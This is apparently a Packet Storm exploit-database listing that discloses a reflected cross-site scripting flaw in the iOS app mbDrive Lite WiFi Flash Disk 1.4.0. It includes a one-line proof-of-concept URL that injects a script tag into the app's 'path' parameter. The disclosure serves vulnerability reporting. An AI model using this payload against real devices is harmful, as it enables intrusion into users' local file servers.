mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting

mbDrive Lite WiFi Flash Disk version 1.4.0 suffers from a cross site scripting vulnerability.


SHA-256 | 51023eaa6d3fa8c871e79d6e732f795bbd9070c25b2bde0918b7f7b75307aee1

Download
# Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
https://apps.apple.com/us/developer/haw-yuan-yang/id291212805
# Software Link:
https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033
# Version: 1.4.0
# Tested on: iPhone ios 15.6


poc:

http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

Source: packetstormsecurity.com
Related Posts